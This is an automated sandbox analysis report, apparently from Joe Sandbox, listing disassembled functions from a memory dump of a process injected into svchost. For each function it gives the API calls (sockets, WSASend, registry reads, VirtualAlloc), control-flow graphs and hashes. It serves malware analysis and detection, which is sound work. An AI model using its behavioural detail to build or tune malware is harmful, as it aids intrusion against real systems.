                                                                                      • Part of subcall function 05B6BD81: htons.WS2_32(?), ref: 05B6BDA2
                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 05B6BFDE
                                                                                    • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 05B6C00F
                                                                                    • closesocket.WS2_32(00000000), ref: 05B6C022
                                                                                    • WSAGetLastError.WS2_32 ref: 05B6C02A
                                                                                    • socket.WS2_32(00000017,00000001,00000000), ref: 05B6C03F
                                                                                    • closesocket.WS2_32(00000000), ref: 05B6C074
                                                                                    • WSAGetLastError.WS2_32 ref: 05B6C07C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Lastclosesockethtonsmemsetsocket$ModeStartupgetsockoptinet_addr
                                                                                    • String ID:
                                                                                    • API String ID: 2777411211-0
                                                                                    • Opcode ID: db992caeca8362980ff30449d603e235414214f20971b64bef60732cbe8211d5
                                                                                    • Instruction ID: 260d24fa397db34d24ab169feb4af7df70db676e838c11031369abcc48a0a1ed
                                                                                    • Opcode Fuzzy Hash: db992caeca8362980ff30449d603e235414214f20971b64bef60732cbe8211d5
                                                                                    • Instruction Fuzzy Hash: 8531F672204301ABD710BA649C8EF7BBEADFF45710F100559F6569B0C0DBB8B804CB61
                                                                                    Function 05B6B478 Relevance: 10.7, APIs: 7, Instructions: 157networkregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 99 5b6b478-5b6b4b7 memset * 2 100 5b6b4cf-5b6b4ea WSASend 99->100 101 5b6b4b9-5b6b4cc CreateEventA 99->101 102 5b6b4ec-5b6b4f0 100->102 103 5b6b53b-5b6b546 GetLastError 100->103 101->100 104 5b6b4f2-5b6b506 102->104 105 5b6b561-5b6b568 102->105 103->105 106 5b6b548-5b6b55c WSAGetLastError call 5b6bd00 103->106 109 5b6b51e-5b6b536 104->109 110 5b6b508-5b6b50d 104->110 107 5b6b575-5b6b589 105->107 108 5b6b56a 105->108 118 5b6b608-5b6b60c 106->118 113 5b6b5a1-5b6b5c1 107->113 114 5b6b58b-5b6b590 107->114 112 5b6b56d-5b6b573 108->112 116 5b6b5ff-5b6b605 call 5b6c812 109->116 110->109 115 5b6b50f-5b6b516 110->115 112->107 112->112 121 5b6b606 113->121 122 5b6b5c3-5b6b5dc RegisterWaitForSingleObject 113->122 114->113 120 5b6b592-5b6b599 114->120 115->109 123 5b6b518-5b6b51b 115->123 116->121 120->113 125 5b6b59b-5b6b59e 120->125 121->118 122->121 126 5b6b5de-5b6b5e8 122->126 123->109 125->113 128 5b6b5ee-5b6b5f5 126->128 129 5b6b5ea-5b6b5ec 126->129 132 5b6b5fa-5b6b5fe 128->132 129->132 132->116
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 05B6B49F
                                                                                    • memset.MSVCRT ref: 05B6B4AB
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,05B650A3,00000000,00000000,05B6505E,00000000), ref: 05B6B4BD
                                                                                    • WSASend.WS2_32(?,05B650A3,?,00000000,00000000,00000010,00000000), ref: 05B6B4E2
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 05B6B53B
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 05B6B548
                                                                                    • RegisterWaitForSingleObject.KERNEL32(00000048,?,05B6B60D,00000000,000000FF,0000000C), ref: 05B6B5D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastmemset$CreateEventObjectRegisterSendSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2712206520-0
                                                                                    • Opcode ID: eccfe10d65386f0021b2da9b001aa25ff0ce90164e2d6639cbec434883a203e9
                                                                                    • Instruction ID: 79616d07a4310a87fc6a6e1c37638a8b0fe599f3ab139c774f816ee68bf9b1d9
                                                                                    • Opcode Fuzzy Hash: eccfe10d65386f0021b2da9b001aa25ff0ce90164e2d6639cbec434883a203e9
                                                                                    • Instruction Fuzzy Hash: AC5170B0510A0AAFDB24CF25C884AA6FBF9FF04354B00866EE956C7A60D734F855CF90
                                                                                    Function 05B647FD Relevance: 9.1, APIs: 6, Instructions: 104registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 05B64817
                                                                                      • Part of subcall function 05B6327F: GetModuleHandleA.KERNEL32(05B8615C,05B8616C), ref: 05B63291
                                                                                      • Part of subcall function 05B6327F: GetProcAddress.KERNEL32(00000000), ref: 05B63298
                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,05B8635C,00000000,00000001,00000068), ref: 05B6483F
                                                                                    • RegQueryValueExW.KERNELBASE(00000068,05B86344,00000000,00000000,?,00000000), ref: 05B64865
                                                                                    • RegCloseKey.KERNELBASE(00000068), ref: 05B6488B
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 05B6489D
                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05B648C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseCurrentDirectoryHandleInformationModuleOpenProcProcessQuerySystemValueVolume
                                                                                    • String ID:
                                                                                    • API String ID: 3913378182-0
                                                                                    • Opcode ID: 5916d2e36735dbf8f13900d66c0268017bfdce2e67e287dc179b1336d78c87f9
                                                                                    • Instruction ID: cd89cce2f88c2262ed91a4d04efb8f34498eb9d2971b700e704699f02887a82d
                                                                                    • Opcode Fuzzy Hash: 5916d2e36735dbf8f13900d66c0268017bfdce2e67e287dc179b1336d78c87f9
                                                                                    • Instruction Fuzzy Hash: 1C31C0B6A01118BADF21DBA5DD49FEF7BBCEF14255F1004A5F605E2040EA74A784CBA0
                                                                                    Function 05B6AC1B Relevance: 7.6, APIs: 5, Instructions: 94networkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 179 5b6ac1b-5b6ac3f ioctlsocket 180 5b6ac57-5b6ac71 CreateIoCompletionPort 179->180 181 5b6ac41 WSAGetLastError 179->181 182 5b6ac73-5b6ac77 180->182 183 5b6ac7c-5b6ac86 180->183 184 5b6ac47-5b6ac48 181->184 185 5b6acaf-5b6acb7 GetLastError 182->185 186 5b6ac79 182->186 187 5b6ac8e-5b6ac95 183->187 188 5b6ac88 183->188 189 5b6ac4b-5b6ac52 call 5b6bd00 184->189 185->189 186->183 190 5b6ac97-5b6ac9a 187->190 191 5b6accd-5b6acd1 187->191 188->187 201 5b6acfb-5b6acfe 189->201 190->191 195 5b6ac9c-5b6ac9e 190->195 193 5b6ace3-5b6ace7 191->193 194 5b6acd3-5b6ace1 call 5b6ad14 191->194 198 5b6ad00-5b6ad07 193->198 199 5b6ace9-5b6acf9 call 5b6ad4b 193->199 194->193 194->201 195->191 200 5b6aca0-5b6aca7 SetFileCompletionNotificationModes 195->200 207 5b6ad0d 198->207 208 5b6ad09 198->208 199->198 199->201 204 5b6acb9-5b6acc4 200->204 205 5b6aca9-5b6acad 200->205 206 5b6ad0f-5b6ad13 201->206 204->191 211 5b6acc6-5b6acc8 204->211 205->191 207->206 208->207 211->184
                                                                                    APIs
                                                                                    • ioctlsocket.WS2_32(05B6BDF5,8004667E,05B6BE72), ref: 05B6AC36
                                                                                    • WSAGetLastError.WS2_32(?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010), ref: 05B6AC41
                                                                                    • CreateIoCompletionPort.KERNELBASE(05B6BDF5,19751710,05B6BDF5,00000000,?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C), ref: 05B6AC61
                                                                                    • SetFileCompletionNotificationModes.KERNEL32(05B6BDF5,00000003,?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C,05B6BDF5), ref: 05B6ACA3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                                                                    • String ID:
                                                                                    • API String ID: 3397353003-0
                                                                                    • Opcode ID: 22feccbec0f238c656a96de6284463656e3106f915e2a4eaf297a2a618355f64
                                                                                    • Instruction ID: 17e9be5250d332ccf05a489de1fb668fe6a381ad0229e42b280e4eb0a14c427f
                                                                                    • Opcode Fuzzy Hash: 22feccbec0f238c656a96de6284463656e3106f915e2a4eaf297a2a618355f64
                                                                                    • Instruction Fuzzy Hash: 7931C571144604EBDF269E24DD46B7A7AAAFF00358F184598FA03B7191EB78FA40C7A4
                                                                                    Function 05B6B1B1 Relevance: 4.6, APIs: 3, Instructions: 136COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 213 5b6b1b1-5b6b1c7 214 5b6b1d2-5b6b1d5 213->214 215 5b6b1c9-5b6b1cd 213->215 217 5b6b1f6-5b6b203 214->217 218 5b6b1d7-5b6b1e6 call 5b6bdce 214->218 216 5b6b2c6-5b6b2cc call 5b6bd00 215->216 226 5b6b2cd-5b6b2d0 216->226 220 5b6b205-5b6b212 call 5b6bf21 217->220 221 5b6b21e-5b6b254 memset 217->221 223 5b6b1eb-5b6b1f0 218->223 220->221 229 5b6b214-5b6b219 220->229 228 5b6b25d-5b6b25f 221->228 223->217 223->226 230 5b6b30f-5b6b313 226->230 231 5b6b261-5b6b269 228->231 232 5b6b2af-5b6b2ba GetLastError 228->232 235 5b6b2c3 229->235 233 5b6b2d2-5b6b2e0 231->233 236 5b6b26b-5b6b279 231->236 232->233 234 5b6b2bc-5b6b2c2 WSAGetLastError 232->234 237 5b6b2e2-5b6b2e7 233->237 238 5b6b2f8-5b6b30b 233->238 234->235 235->216 239 5b6b28e-5b6b2ad call 5b6c812 236->239 240 5b6b27b-5b6b27d 236->240 237->238 244 5b6b2e9-5b6b2f0 237->244 242 5b6b30d 238->242 239->242 240->239 241 5b6b27f-5b6b286 240->241 241->239 245 5b6b288-5b6b28b 241->245 242->230 244->238 247 5b6b2f2-5b6b2f5 244->247 245->239 247->238
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bdfdf908db1582a25867ec5e372573532024cffcffb5ae162623649fed189fa3
                                                                                    • Instruction ID: 5ebda001b87e4004d2cc65d0d16403c09eec5a4c9047ef82c4c0360c13e92fde
                                                                                    • Opcode Fuzzy Hash: bdfdf908db1582a25867ec5e372573532024cffcffb5ae162623649fed189fa3
                                                                                    • Instruction Fuzzy Hash: 374167B16102059FDB14DF25C885BA6BBB9FF05314F0481A9ED0ACF296DB38E805CBA0
                                                                                    Function 05B6BB4C Relevance: 4.6, APIs: 3, Instructions: 119COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 248 5b6bb4c-5b6bb62 249 5b6bb64-5b6bb69 248->249 250 5b6bb88-5b6bb8d 248->250 253 5b6bb77-5b6bb80 call 5b6bc89 249->253 254 5b6bb6b-5b6bb75 shutdown 249->254 251 5b6bbe0-5b6bbe6 250->251 252 5b6bb8f-5b6bb93 250->252 256 5b6bc0a-5b6bc10 251->256 257 5b6bbe8-5b6bbf1 251->257 252->251 255 5b6bb95-5b6bb9e call 5b6bc89 252->255 253->251 269 5b6bb82-5b6bb86 253->269 254->251 255->251 270 5b6bba0-5b6bba8 255->270 260 5b6bc34-5b6bc39 256->260 261 5b6bc12-5b6bc1b 256->261 257->256 262 5b6bbf3-5b6bbf5 257->262 266 5b6bc3b-5b6bc44 closesocket 260->266 267 5b6bc48-5b6bc54 260->267 261->260 265 5b6bc1d-5b6bc1f 261->265 262->256 268 5b6bbf7-5b6bbf9 262->268 265->260 271 5b6bc21-5b6bc23 265->271 266->267 272 5b6bc56-5b6bc58 267->272 273 5b6bc5a-5b6bc5d 267->273 268->256 274 5b6bbfb-5b6bc02 268->274 269->251 270->251 276 5b6bbaa-5b6bbac 270->276 271->260 277 5b6bc25-5b6bc2c 271->277 272->273 278 5b6bc60-5b6bc6e 272->278 273->278 274->256 275 5b6bc04-5b6bc07 274->275 275->256 279 5b6bbae-5b6bbb9 276->279 277->260 280 5b6bc2e-5b6bc31 277->280 281 5b6bc85-5b6bc88 278->281 282 5b6bc70-5b6bc75 278->282 283 5b6bbcf-5b6bbdc 279->283 284 5b6bbbb-5b6bbc2 279->284 280->260 282->281 285 5b6bc77-5b6bc82 282->285 283->279 287 5b6bbde-5b6bbdf 283->287 284->283 286 5b6bbc4-5b6bbcb closesocket 284->286 285->281 286->283 287->251
                                                                                    APIs
                                                                                    • shutdown.WS2_32(D7FF5605,00000001), ref: 05B6BB6F
                                                                                    • closesocket.WS2_32(?), ref: 05B6BBC5
                                                                                    • closesocket.WS2_32(D7FF5605), ref: 05B6BC3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: closesocket$shutdown
                                                                                    • String ID:
                                                                                    • API String ID: 3079814495-0
                                                                                    • Opcode ID: 5ea31034f55a804da29922dd677ff0602e4f309498a75f04d3e45a3defccc78d
                                                                                    • Instruction ID: 741b32d23397847e55e5683e26c335db429bea188f1e73377e6f5078e5effde3
                                                                                    • Opcode Fuzzy Hash: 5ea31034f55a804da29922dd677ff0602e4f309498a75f04d3e45a3defccc78d
                                                                                    • Instruction Fuzzy Hash: DA416A71518B059FEB348E25C455B62B7F1FF003A4F189A5DE893D6AA0CB39F546CB40
                                                                                    Function 05B6BA74 Relevance: 3.1, APIs: 2, Instructions: 86networkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 288 5b6ba74-5b6ba80 289 5b6ba82-5b6ba87 288->289 290 5b6ba9c-5b6bab5 288->290 289->290 291 5b6ba89-5b6ba8b 289->291 292 5b6bab7-5b6bad0 setsockopt 290->292 293 5b6bb0b-5b6bb21 call 5b6c0bb call 5b6bd00 290->293 291->290 295 5b6ba8d-5b6ba94 291->295 296 5b6bad2-5b6baee call 5b6afbc 292->296 297 5b6baf0-5b6bb09 WSAGetLastError call 5b6bd00 292->297 308 5b6bb24-5b6bb2f 293->308 295->290 300 5b6ba96-5b6ba99 295->300 296->308 297->308 300->290 310 5b6bb47-5b6bb4b 308->310 311 5b6bb31-5b6bb33 308->311 311->310 312 5b6bb35-5b6bb37 311->312 312->310 313 5b6bb39-5b6bb44 312->313 313->310
                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 05B6BAC8
                                                                                    • WSAGetLastError.WS2_32(?,05B69BAC,00000000,00000000,?,00000000,00000000,00000000,05B69A2D,00000000,?,00000000,05B63488,?,00000000,?), ref: 05B6BAF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 1729277954-0
                                                                                    • Opcode ID: e96894c4def4b41a9f228dbb48c1dcc97115e5e857f6ffef56c94a9827f305c6
                                                                                    • Instruction ID: a0a5d8bfd6ccada92c9f6cef616d5d7d192a40fae310d8c06ecdc63c433985ad
                                                                                    • Opcode Fuzzy Hash: e96894c4def4b41a9f228dbb48c1dcc97115e5e857f6ffef56c94a9827f305c6
                                                                                    • Instruction Fuzzy Hash: CA314A74204A06AFDB209F25C885E66B7B8FF09364B048659E95ADB685C734F411CB94
                                                                                    Function 032C00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032C00CD
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032C0279
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000003.2196728803.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_3_32c0000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                    • Instruction ID: c32fb80a5a9efa50835c74f409a3ffa00e8ba22a2d28db494e206044b1cb1fbf
                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                    • Instruction Fuzzy Hash: BC719071D2428ADFDB41CF98C981BEDBBF0AF09314F288199E465F7241C274AA91CF65
                                                                                    Function 05B65514 Relevance: 2.6, APIs: 2, Instructions: 66COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • malloc.MSVCRT ref: 05B6551F
                                                                                    • memset.MSVCRT ref: 05B65534
                                                                                      • Part of subcall function 05B6ED4F: memset.MSVCRT ref: 05B6ED5A
                                                                                      • Part of subcall function 05B6ED63: calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,05B65573,?,05B87BE8,?,?,?,00000000,00000000,0000017C), ref: 05B6ED86
                                                                                      • Part of subcall function 05B6F06E: strlen.MSVCRT ref: 05B6F07C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$callocmallocstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 285299393-0
                                                                                    • Opcode ID: a7979f55b45becd19308483faee48fd95861266170b6545ac317ff82d956d889
                                                                                    • Instruction ID: e5282d1b4aac0c689161bbc7b936f6c7b3cee1132ce16b0f75849586eb53a77f
                                                                                    • Opcode Fuzzy Hash: a7979f55b45becd19308483faee48fd95861266170b6545ac317ff82d956d889
                                                                                    • Instruction Fuzzy Hash: D21190B6B00700BBDB20AF94CD4AF5BBBA9EF40B10F044498F51997251C779F820C754
                                                                                    Function 05B64F50 Relevance: 2.5, APIs: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 335 5b64f50-5b64f63 malloc call 5b6a8fd 337 5b64f68-5b64f6d 335->337 338 5b64f6f-5b64f7a free 337->338 339 5b64f7b-5b64f8a call 5b64f8b 337->339
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: bcf070cb6468ae2749009098a856ba24bbb31d298e37fc396ed2bd95a22daf24
                                                                                    • Instruction ID: 91b8b3a72831a1b4ecaf6b9e55b3f1cfff2af9fdc25c443691d49768ac9370a9
                                                                                    • Opcode Fuzzy Hash: bcf070cb6468ae2749009098a856ba24bbb31d298e37fc396ed2bd95a22daf24
                                                                                    • Instruction Fuzzy Hash: 1AD02B3B11C6219FDB6527307C0E9EB7FD7EF01160B004895FC0681080EF157401C2A7
                                                                                    Function 05B6AFE4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 342 5b6afe4-5b6b00f 343 5b6b024-5b6b02c 342->343 344 5b6b011-5b6b014 342->344 346 5b6b050-5b6b054 343->346 347 5b6b02e-5b6b033 343->347 344->343 345 5b6b016-5b6b01f 344->345 345->343 348 5b6b021 345->348 349 5b6b047-5b6b049 call 5b6b055 347->349 350 5b6b035-5b6b038 347->350 348->343 353 5b6b04e-5b6b04f 349->353 350->349 351 5b6b03a-5b6b044 CreateEventA 350->351 351->349 353->346
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,05B628A5,?,05B6A87B,?,05B628A5,05B628A5,05B653A0,?,05B653D5,05B65421,05B65376,?), ref: 05B6B03E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateEvent
                                                                                    • String ID:
                                                                                    • API String ID: 2692171526-0
                                                                                    • Opcode ID: a1d068c2771ac24d69944f954b4b136a605e38ffab2f2a1dc802ecaf43e507b6
                                                                                    • Instruction ID: d6f9fc503c75b3ded429b2ed0d6acc51b63e36f7313c5cfdfa782e7455d056d1
                                                                                    • Opcode Fuzzy Hash: a1d068c2771ac24d69944f954b4b136a605e38ffab2f2a1dc802ecaf43e507b6
                                                                                    • Instruction Fuzzy Hash: AD012575504701AFE735CE25D440A77BBFAFB88320F04895EE996C6A40E338F845CB50
                                                                                    Function 05B6ED63 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 354 5b6ed63-5b6ed8f calloc 355 5b6eda6-5b6edad 354->355 356 5b6ed91-5b6eda4 354->356 357 5b6edc4-5b6ee14 355->357 356->355 359 5b6edaf-5b6edc2 call 5b6ef90 call 5b6ee1d 356->359 365 5b6ee18-5b6ee1c 357->365 359->357 367 5b6ee16 359->367 367->365
                                                                                    APIs
                                                                                    • calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,05B65573,?,05B87BE8,?,?,?,00000000,00000000,0000017C), ref: 05B6ED86
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: calloc
                                                                                    • String ID:
                                                                                    • API String ID: 2635317215-0
                                                                                    • Opcode ID: 2f57be34e45820100d6de1deec8cb3575f4fcae74f88a9e8f426e76fc916c6fa
                                                                                    • Instruction ID: c4b2a729901924507573fd979e007df4edc38a48d631fe056bd5bcd3c84e0b5b
                                                                                    • Opcode Fuzzy Hash: 2f57be34e45820100d6de1deec8cb3575f4fcae74f88a9e8f426e76fc916c6fa
                                                                                    • Instruction Fuzzy Hash: 19212CB5914B009FD7208F2AD841A86FBE9FF94754F20481FE69AC3290DBB0F440CB54
                                                                                    Function 05B622BC Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 368 5b622bc-5b622ca malloc 369 5b622e3-5b622e8 368->369 370 5b622cc-5b622e0 368->370 371 5b622ec-5b622f9 call 5b62303 369->371 372 5b622ea 369->372 370->369 374 5b622fe-5b62302 371->374 372->371
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc
                                                                                    • String ID:
                                                                                    • API String ID: 2803490479-0
                                                                                    • Opcode ID: df0667c74f8202bac1d1bee4e526b2f8b6f4d6581ee99f3f5b62d38cb322d280
                                                                                    • Instruction ID: dbf5234e0542b1a3740e34edf7fe6878c7a3462fa5cf778f37a228e2c4af0d59
                                                                                    • Opcode Fuzzy Hash: df0667c74f8202bac1d1bee4e526b2f8b6f4d6581ee99f3f5b62d38cb322d280
                                                                                    • Instruction Fuzzy Hash: 3BF0F8B96042099FDF098F94D854DA97FA6FF48310B0540ADFD0A8B360CB35E820DB64

                                                                                    Non-executed Functions

                                                                                    Function 032C0283 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000003.2196728803.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_3_32c0000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                    • Instruction ID: b77502baae3db4613bb0df9481517e5a6be31979dcadd5d25a73c49c8d4f9907
                                                                                    • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                    • Instruction Fuzzy Hash: 34F0C275B31641CFD724CF09C944C95B7F6FB80710B288699D404EB261D3B0DD84CB52
                                                                                    Function 05B65920 Relevance: 31.6, APIs: 25, Instructions: 300COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86FBC,00000001,00000000,?,05B63ABF,?,?), ref: 05B6594F
                                                                                    • memcmp.MSVCRT(?,05B86FB8,00000002), ref: 05B6597E
                                                                                    • memcmp.MSVCRT(?,05B86FB4,00000003), ref: 05B659BE
                                                                                    • memcmp.MSVCRT(?,05B86FA0,00000004), ref: 05B65A53
                                                                                    • memcmp.MSVCRT(?,05B86F98,00000005), ref: 05B65A97
                                                                                    • memcmp.MSVCRT(?,05B86F70,00000006), ref: 05B65B55
                                                                                    • memcmp.MSVCRT(?,05B86F58,00000007), ref: 05B65BD1
                                                                                    • memcmp.MSVCRT(?,05B86F3C,00000008), ref: 05B65C4F
                                                                                    • memcmp.MSVCRT(?,05B86F18,00000009), ref: 05B65CCB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    • Opcode ID: ce0291fd8d280c7b3de9e4abed35b27356394ff58732e7317f8e75a7cfff16b1
                                                                                    • Instruction ID: 2197a14119adc33526167d4e0df6c8b7edd470e7cfe47c658f1db618008769f2
                                                                                    • Opcode Fuzzy Hash: ce0291fd8d280c7b3de9e4abed35b27356394ff58732e7317f8e75a7cfff16b1
                                                                                    • Instruction Fuzzy Hash: BC8184B2F8870066DB307F2C5E4AF7A3796AB30684F4460D0FD45E9296F259F619C242
                                                                                    Function 05B6ADBB Relevance: 16.7, APIs: 11, Instructions: 168networkregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WS2_32(00003A9A,00000001,00000000), ref: 05B6ADE5
